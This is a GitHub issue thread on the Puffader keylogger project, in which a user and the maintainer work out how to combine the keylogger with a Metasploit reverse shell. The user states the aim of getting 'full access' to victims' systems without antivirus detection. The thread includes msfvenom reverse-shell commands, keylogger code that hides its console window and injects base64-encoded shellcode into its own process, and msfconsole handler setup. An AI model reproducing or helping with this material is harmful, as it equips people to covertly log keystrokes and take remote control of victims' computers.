xp4xbox / Puffader

Python 2.7 is obsolete, please use https://github.com/xp4xbox/Python-Keylogger
MIT License

bind the puffader with reverse shell #46

Closed joker8989 closed 6 years ago

joker8989 commented 6 years ago

Hey, I wanted to know if someone knows how to bind the Puffader keylogger with a reverse shell (get full access to the system - don't ask me why I use reverse), and the keylogger is for keystrokes from every client/bot/slave I get...

The big problem when I try to bind files is that the AV runs a 15-second scan of the file (so the victim does not need to be smart to know he has been hacked...).

xp4xbox commented 6 years ago

Check the readme. I included instructions for an undetectable meterpreter shell, since it injects the shellcode into Puffader itself, so the actual reverse shell never touches disk.

joker8989 commented 6 years ago

Oh, thanks, I did not notice...

joker8989 commented 6 years ago

But will Puffader run on the victim system? I know myself how to create a FUD py file (or meterpreter)???

xp4xbox commented 6 years ago

Yeah it will.

joker8989 commented 6 years ago

Hey man, I have some issues setting this up:

  1. run: msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c
  2. copy the shellcode into "base64encoder.py"
  3. run "base64encoder.py"
  4. paste what "base64encoder.py" prints into "Puffader_Code_Addition.py"
  5. run "Puffader_Code_Addition.py"

The file that's created is a pyc and can't be converted to exe... (I think the error is: compile(): string without null bytes..)

Any kind of help?

xp4xbox commented 6 years ago

You don't run Puffader_Code_Addition. Did you make sure to move the code_injector module to the same dir when compiling?

Your puffader.py should look something like this:

```python
def hide():
    window = win32console.GetConsoleWindow()
    win32gui.ShowWindow(window, 0)
    return True
# hide window as new thread. Necessary in order to define timer used later
objTimer = threading.Timer(0, hide); objTimer.start()

# function to prevent multiple instances
mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4")
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
    mutex = None
    exit()

import code_injector, base64
# base64 shellcode
b64shellcode = "/OiCAAAAYInlMcBki1Awi1IMi1fYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdykAEAACnEVFBoKYBrAP/VagpowKgKI2gCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/0ezoYQAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0iWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCTpcf///wHDKcZ1x8O78LWiVmoAU//V"
shellcode = base64.b64decode(b64shellcode)  # decode shellcode
pid = os.getpid()  # get current pid

code_injector.InjectShellCode(pid, shellcode)

def GetExIp():  # function to get external ip
    global strExIP
    try:
        strExIP = urlopen("http://ident.me").read().decode('utf8')
    except:
        strExIP = "?"
# obj defined for later use for screenshot timer
objTimer2 = threading.Timer(0, GetExIp); objTimer2.start()
```

joker8989 commented 6 years ago

Yep, they're in the same location (as I downloaded it): Puffader_Code_Addition and code_injector are in the same place... But did I type it right?

msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c

Can you please tell me the steps for how to do it? It's not clear in the readme :(

xp4xbox commented 6 years ago

Yeah, the msfvenom command is right. Puffader_Code_Addition is just the code that needs to be added to the actual puffader.py. You don't need a pyc file. Py2exe will automatically include the code_injector module as long as it's in the same dir.

xp4xbox commented 6 years ago

Can you show me your puffader.py code?

joker8989 commented 6 years ago

Yeah, when I'm back home, in about 2 hours...

joker8989 commented 6 years ago

OK, so what I did (before pasting the puffader.py code):

  1. generate shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c

  2. run base64encoder.py with the shellcode inside...

  3. move all the files into the same dir

  4. paste Puffader_Code_Addition.py into puffader.py between the hide function and the GetExIp function..

What base64encoder.py generates (python base64encoder.py) is:

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

The real code:

```python
def hide():
    window = win32console.GetConsoleWindow()
    win32gui.ShowWindow(window, 0)
    return True
# hide window as new thread. Necessary in order to define timer used later
objTimer = threading.Timer(0, hide); objTimer.start()

# function to prevent multiple instances
mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4")
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
    mutex = None
    exit()

import os, code_injector, base64
# base64 shellcode
b64shellcode = "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"
shellcode = base64.b64decode(b64shellcode)  # decode shellcode
pid = os.getpid()  # get current pid

code_injector.InjectShellCode(pid, shellcode)  # inject the shellcode into the program

def GetExIp():  # function to get external ip
    global strExIP
    try:
        strExIP = urlopen("http://ident.me").read().decode('utf8')
    except:
        strExIP = "?"
# obj defined for later use for screenshot timer
objTimer2 = threading.Timer(0, GetExIp); objTimer2.start()
```

xp4xbox commented 6 years ago

I just built it with no problems.

BTW, instead of windows/shell_reverse_tcp, windows/meterpreter/reverse_tcp is better.

joker8989 commented 6 years ago

And you got a connection from the client? I will look at this soon. Very strange; I am glad to hear that it's only for me that it's not working...

I succeeded: I created an exe file with pyinstaller with meterpreter/reverse_tcp...

But I don't get a connection. I execute the program, set everything I need in msfconsole, and nothing...

I always get "the program stopped working".

Can someone help me? I always get

"file.exe has stopped working"

I tried to convert with pyinstaller and py2exe... Did someone get a connection from the Puffader file that includes the meterpreter plugin?

Do you have Skype? It would be easier to resolve the problem...

xp4xbox commented 6 years ago

Next time, edit your comments into one. For msfconsole, did you make sure to type:

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IPHERE
set LPORT 4444
set ExitOnSession false
exploit -j -z
```

I don't have skype unfortunately, but I have your email.

joker8989 commented 6 years ago

Of course I did it... except set ExitOnSession false. So send me an email so I have you, and I will send you a video or something; it will be easier..

But it's not explaining the reason for the "program has stopped working...."

@xp4xbox what's your email?